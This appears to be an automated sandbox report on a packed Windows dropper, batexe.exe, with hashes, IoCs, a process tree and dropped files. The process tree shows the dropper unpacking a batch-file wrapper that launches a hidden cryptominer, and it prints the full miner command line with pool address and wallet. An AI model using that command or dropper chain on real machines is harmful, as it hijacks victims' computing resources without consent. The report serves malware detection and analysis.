73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
294s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
17/02/2024, 06:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4952	b2e.exe
2328	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2328	cpuminer-sse2.exe
2328	cpuminer-sse2.exe
2328	cpuminer-sse2.exe
2328	cpuminer-sse2.exe
2328	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3156-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3156 wrote to memory of 4952	3156	batexe.exe	74
PID 3156 wrote to memory of 4952	3156	batexe.exe	74
PID 3156 wrote to memory of 4952	3156	batexe.exe	74
PID 4952 wrote to memory of 4968	4952	b2e.exe	75
PID 4952 wrote to memory of 4968	4952	b2e.exe	75
PID 4952 wrote to memory of 4968	4952	b2e.exe	75
PID 4968 wrote to memory of 2328	4968	cmd.exe	78
PID 4968 wrote to memory of 2328	4968	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3156
- C:\Users\Admin\AppData\Local\Temp\2219.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\2219.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\2219.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2882.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4968
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2328

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2219.tmp\b2e.exe

Filesize
4.3MB

MD5
50bf317b0ab9c6221631bacbc7920145

SHA1
3172e6b4cdf9b4b07e534f4b0def16a75be40ce9

SHA256
85f6322072d9c52343028ad2ee723d811e3f4697ef98f6623e88bfcbfab19640

SHA512
d34ae1f872c1fe1f6b09257e17e75de9e3bab05b5beea1f8be74fe74c81ff65ed1566af72d4e601a447ad632efd1d8c418fe5d72cd97ccf4829bb261c3546d71

Download Submit
C:\Users\Admin\AppData\Local\Temp\2219.tmp\b2e.exe

Filesize
4.3MB

MD5
7cc1e319a5cecb983bb9850090bb18e3

SHA1
cd098f38290a9638710713591f6e4d58c226d6b9

SHA256
dfbda2755dcb939dbbe64f6edcfacdca89010cdf658e3135fc65733c851c5375

SHA512
3dc65fbd3fb1f484b016daf43b8c7634bbe28caefea7c40a99923a0c5cc6631ec58ee15e220f6d0fca1f89669ce27ce7ae4aa7803b598ed4164d5856332364aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\2882.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
513KB

MD5
fdc70a4da974b8d4480241b058b66632

SHA1
55c2d4640fc1fb83dbd8bff23337af87420f6eed

SHA256
f19f3c328a865276f4144e16128e26f5cafaff1086f27f3c2c0e90606562c9e5

SHA512
687a1c8534b3ba5e3a889fd8c96ae905c73f8935a87c3eb78fb72f9ef2ef0011051ce04a3b0a612257c91b0543bab317150e6d047a1f70109541e81194dde9c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
404KB

MD5
3146c85becc6e905bf2e2d5e71670f67

SHA1
8b2dcb5b56cd1242204e392fc25c8bb5ef7ab453

SHA256
46f6eeb5f49fe409008d1a1a1ef512e712536be23a34f00aa779fe7cf70ebc63

SHA512
b9fd3e2fcd46578d700bb659d87eccfd2ed87e8f67f57b26f450cc5a6adce482d6e14dddfe55faf46e04f23a075affe59309babea15fbe359c3d01561f6e9db6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
469KB

MD5
68cee9ee68be3eac126cff6faa9ad319

SHA1
09c12e51c15c2dc0073722853544a3dff0364827

SHA256
f09e4f1fb2aac39cd5d12adef45e4d83634e4a3d60424207743f44e505a2cef2

SHA512
dabd121b74f910998c88d6f5511bd94d494433bbad1184b2888e58749caabe7eaf669824e63c334879c47bd73b83269969731a94c15931abb77a062b1ea26c95

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
319KB

MD5
d4a22a9f15933c1dfcf49731f64abf92

SHA1
53114c6261307378fac2b8cf6291aa49766ca32f

SHA256
1c75bb9e78acba8c8d5cd0df620cbdc2867a45c891dd70433fd685106a9b2638

SHA512
f2dbfe52f1d40719a79f6b9b0e0ed8ebdb755b2e1ead74348cbd51e3580249274bdded9289773aac6128c1c113932a86e75b5549c7c549d7bd69bc8e520c7596

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
520KB

MD5
5eeb520d154befcd066bb5d3e9c5063d

SHA1
0e3aa9117aa4125ec11df5578f6cc536905381f4

SHA256
5da82f2b71912eed3b556ca9e07288a458c1f4213e991347c1c7d6e05764effc

SHA512
ab87160a0b7c9b4d2a3f8fa026ac51b9846ea08b136cc6785eb3095f535b12b727db2ac6e943e12af1e4cf5aa6ccb556768fd9ce1ad18ec028980904049534ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
64KB

MD5
6cccf65bd7d7ff5b53aeb882e15c462c

SHA1
a9822b63ad70c6085ed1deda0fbe4bc5fe555f3d

SHA256
1379cd6111c2c37cf16f2dd9b325118513e85c35543ba45e79deb504dd4c01d2

SHA512
c174b5f8615131c2b86c57aee166744ee1fe02ff7c916195f2fde06684f467545a3fa4f88083335e2045d12727d774279dc8672ec352de3095b729aa5d1dedcb

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
527KB

MD5
cb8ca1ce7cc2380b195bf1db1b2ce309

SHA1
a5e38884a5cd3d6a11a4f121eea36c71b219c0e9

SHA256
44d8fe96a7655b76d3004d9c16888a884995eeab13122ec03a1a02a0545342db

SHA512
046c653813d9af540d6008c2b747caf316dcd2a6a0c344d6434d71d6c8a2449ab79b963eda38eae9071934db0d12617fd472351299cdb8c5206b8cf2ebbed6cc

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
401KB

MD5
4f6c6e2edd97292c5e136c1a608ade23

SHA1
d429e28f502956fd855e30a657ca53afc2e4ff5c

SHA256
5dab00520ada913358ffc829335975761fa91d6bd9be18e2032ddbb1be0c5b9c

SHA512
ca5dd3b5c5b1bacf5313e6cb625996496b8a4e0c89454e6ca0061d7ffd68d4bb7b229b7c0d6027befcb20c8f7294b09a647130c383020c40d749ef55a15c7bf0

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
541KB

MD5
02228546c62eb37c8f241950cf042b7e

SHA1
6d911419ce819e00da08a36231f911625ad843f2

SHA256
f1ea513ae8cc37c0763de1e0a74c8f6afc55580f37ebe829a1794064d565e67f

SHA512
a27724ecc7e62750baa84ad8ca98b09dbb6b7a81f46097b00d385c5c05f2be9a234f4d10361f91a6e3a7de38238d1ebc945a1078b57cb1f7d24248aead2de307

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
395KB

MD5
e2f604be3296ff0054e66e27df4b996b

SHA1
de4583955a5cdf6d16edf44c13b30c90854f7d45

SHA256
f5cb525e7398ed642c273a61cf9bd96849e3782a1b32ca8b04c1d1c511a3573c

SHA512
36809db74e5d7f255b70f07f74a2c08fc090b3b2fdb42be4f1fbe291e85824d0b49f7373f2f9a54c178243a8d1c17cb2b39fd49da5b77f84e33b83478d600424

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
297KB

MD5
542b7fc22a88fd2923d6be20a2648137

SHA1
e3f56689043ba016e277a715d94a46a900ad8fa2

SHA256
166af3628dfe19ca6b4e3f78687b42b8439e76d897e49cebcb151cfeab9e2394

SHA512
421f598593f81ef1eacf3b35038bc95a1f86d760e43e123769193ba87853898a10312e9de58c9b937cc4cdfd4c5ec151f5d7dfadfd8eb8586a31859f5f31ebbb

Download Submit
memory/2328-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2328-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2328-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2328-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2328-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2328-43-0x0000000050AE0000-0x0000000050B78000-memory.dmp

Filesize
608KB

Download
memory/2328-44-0x00000000010D0000-0x0000000002985000-memory.dmp

Filesize
24.7MB

Download
memory/2328-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2328-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2328-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2328-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2328-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2328-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3156-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4952-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4952-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download